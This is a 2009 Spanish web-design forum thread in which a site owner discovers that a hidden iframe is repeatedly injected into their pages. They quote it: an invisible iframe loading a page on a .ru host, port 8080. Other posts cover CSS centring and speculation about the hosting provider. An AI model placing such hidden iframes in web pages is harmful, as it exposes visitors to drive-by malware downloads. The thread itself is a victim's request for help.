Comunidad de diseño web y desarrollo en internet online

web se centra verticalmente

Citar            
MensajeEscrito el 13 Jul 2009 08:54 am
hola amigos, llevo tiempo haciendo webs y nunca me había pasado ésto.
tengo un swf q meto dentro de una tabla (para centrarlo horizontalmente) y en las propiedades de la página le digo q el margen superior sea de -1 para q quede acoplada arriba.
siempre lo he hexo así y nunca me ha dado problemas, xo desde hace unas semanas las webs me quedan centradas verticalmente. ¿¿puede q sea problema de los del hosting?? lo digo xq me pasa en varias paginas distintas q tengo subidas desde hace un tiempo.
he pruebado a borrar el index.html del ftp y lo subo otra vez sin hacerle cambios, y aparece bien, pero a los 2 o 3 días vuelve a pasar.¿a alguien le ha pasado? ¿sabríais xq es?
muchas gracias a todos!! :lol:

Por vi

10 de clabLevel



 

msie7
Citar            
MensajeEscrito el 14 Jul 2009 11:38 pm
Deja la tabla y usa CSS

Mete el código del swf en un div y has esto

Código HTML :

<div style="width: ###px; position:absolute; top:50%; left:50%; margin-top: -###px; margin-left: -###px;


width ### va el ancho del swf
margin-top ### el alto entre 2 osea el 50% el alto
margin-lef ### idem pero con el ancho.

Espero te sirva

saludos

Por MmO

1078 de clabLevel

4 tutoriales

Genero:Masculino  

Marketing interactivo y gestión de proyecto de software.

safari
Citar            
MensajeEscrito el 15 Jul 2009 09:42 am
Gracias MmO
he descubierto una cosilla que muy probablemente sea el problema.
al descargarme el index.html del ftp para comprobar que estaba todo bien, he encontrado dentro del <body> esto;

Código :

<iframe src="http://u5e.ru:8080/index.php" width=118 height=183 style="visibility: hidden"></iframe>

puedo asegurar que este código no lo puse yo, y al quitarlo vuelve a verse bien.
¿xq puede ser que me aparezca? ¿es algo que he podido hacer yo o será algo del ftp?
muxas gracias!!

Por vi

10 de clabLevel



 

msie7
Citar            
MensajeEscrito el 15 Jul 2009 06:31 pm
Estás usando un hosting gratuito o bien que editor de código estás usando?

Por MmO

1078 de clabLevel

4 tutoriales

Genero:Masculino  

Marketing interactivo y gestión de proyecto de software.

safari
Citar            
MensajeEscrito el 16 Jul 2009 12:17 am
eso tiene pinta que si estas en un hosting gratuito lo agregaron ellos

Por 22

79 de clabLevel



 

Uruguay

msie7
Citar            
MensajeEscrito el 17 Jul 2009 09:46 pm

22 escribió:

eso tiene pinta que si estas en un hosting gratuito lo agregaron ellos


Así es, un hosting gratuito le mete mano automáticamente a tu código para meterle sus cosas, como publicidad y demás, y si tú no has puesto el iframe, ellos lo hicieron.

PD: El 99.9% de personas aquí te dirán que NO uses tablas para maquetar, y están en lo cierto, usa CSS. :wink:

Saludos.

Jao

Por Rándich

623 de clabLevel

1 tutorial

 

firefox
Citar            
MensajeEscrito el 20 Jul 2009 08:21 am
hola a todos.
lo primero, mi hosting no es gratuito.
he estado investigando y he descubierto q lo q tengo es un iframe inyectado. se ve q estos iframes llevan virus q se descargan en los equipos al abrir la página. logicamente los de l hosting no lo han puesto ahí.
dicen por otros foros q suele pasar cuando tienes el worldpress caducado... xo no sé lo que es el worldpress, ¿alguin me lo cuenta?
pese a todo me he puesto en contacto con los del hosting a ver si me echan una mano, y no al cuello como suelen hacer, jajjajaa.
un saludo!!

Por vi

10 de clabLevel



 

msie7
Citar            
MensajeEscrito el 20 Jul 2009 08:24 am
perdón, quise decir el worldpress "desactualizado", no caducado!!
gracias!!

Por vi

10 de clabLevel



 

msie7
Citar            
MensajeEscrito el 27 Jul 2009 10:14 am
hola, sigo con el problema a cuestas. se trata de un iframe inyectado. los del hosting me dicen q baje los archivos, los limpie y los vuelva a subir. pero tras hacerlo, a los varios días, vuelve a aparecer dicho iframe.

tambien he leido por ahí q cambie las contraseñas de los paneles de control, ftps, etc... xo no entiendo xq!!

alguna idea de q debería hacer??
gracias!!

Por vi

10 de clabLevel



 

chrome

 

Cristalab BabyBlue v4 + V4 © 2011 Cristalab
Powered by ClabEngines v4, HTML5, love and ponies.